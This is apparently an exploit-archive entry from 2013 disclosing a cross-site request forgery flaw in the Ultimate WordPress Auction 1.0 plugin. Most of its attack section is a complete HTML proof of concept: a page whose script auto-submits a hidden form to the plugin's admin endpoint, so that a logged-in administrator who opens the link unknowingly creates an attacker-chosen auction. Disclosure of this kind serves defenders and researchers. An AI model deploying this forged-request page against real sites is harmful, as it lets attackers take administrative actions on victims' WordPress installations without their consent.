============================================================= __ __ _ ___ _ __ ____ \ \ / / | | / _ \ (_) /_ | |___ \ ___ \ V / _ __ | | | | | | _ | | __) | _ __ / _ \ > < | '_ \ | | | | | | | | | | |__ < | '__| | __/ / . \ | |_) | | | | |_| | | | | | ___) | | | \___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_| | | |_| blackpentesters.blogspot.com ============================================================= ############################################################################## # Exploit Title: [ Ultimate WordPress Auction v1.0 Plugin CSRF Vulnerability ] # Date: [2013-6-15] # Exploit Author: [expl0i13r] # Vendor Homepage: [http://wordpress.org/plugins/ultimate-auction/] # Software Link: [http://downloads.wordpress.org/plugin/ultimate-auction.zip] # Version: [1.0] # Tested on: [Wordpress 3.5.1 (Windows)] # Contact: expl0i13r@gmail.com ############################################################################## 1. Plugin Description: ======================== The Ultimate WordPress Auction plugin allows easy and quick way to set up a professional auction website in ebay style. 2. Vulnerability Description: ============================== This wordpress plugin "Ultimate WordPress Auction 1.0" suffers from CSRF vulnerability which can be successfully exploited by attacker to add Fake Auction Bids. Affected URL: -------------- http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction eXpl0it code: -------------- <html> <head> <script type="text/javascript" language="javascript"> function submitform() { document.getElementById('myForm').submit(); } </script> </head> <body> <form name="myForm" id="wdm-add-auction-form" class="auction_settings_section_style" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction" method="POST" novalidate="novalidate"> Link: http://blackpentesters.blogspot.in/ Title: <input name="auction_title" type="text" id="auction_title" class="regular-text valid" value="expl0iter"> Description: <textarea name="auction_description" type="text" id="auction_description" cols="50" rows="10" class="large-text code valid"></textarea> <input name="opening_bid" type="text" id="opening_bid" class="small-text number" min="0" value=""> <input name="lowest_bid" type="text" id="lowest_bid" class="small-text number" min="0" value=""> <input name="incremental_value" type="text" id="incremental_value" class="small-text number" min="0" value=""> <input name="end_date" type="text" id="end_date" class="regular-text hasDatepicker" readonly="" value="2013-07-10 00:00:00"> <input name="buy_it_now_price" type="text" id="buy_it_now_price" class="small-text number" min="1" value=""> <input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes"> </form> <script type="text/javascript" language="javascript"> document.myForm.submit() </script> </body> </html> Once victim clicks on this link new auction of attackers choice will be added.(provided victim logged in to wordpress) ################################## # eXpl0i13r # # ------------------------------ # #|blackpentesters.blogspot.com |# #|infotech-knowledge.blogspot.in|# # ------------------------------ # ##################################Брой прочитания на тази страница: 1030
Ultimate WordPress Auction Plugin 1.0 – CSRF Vulnerability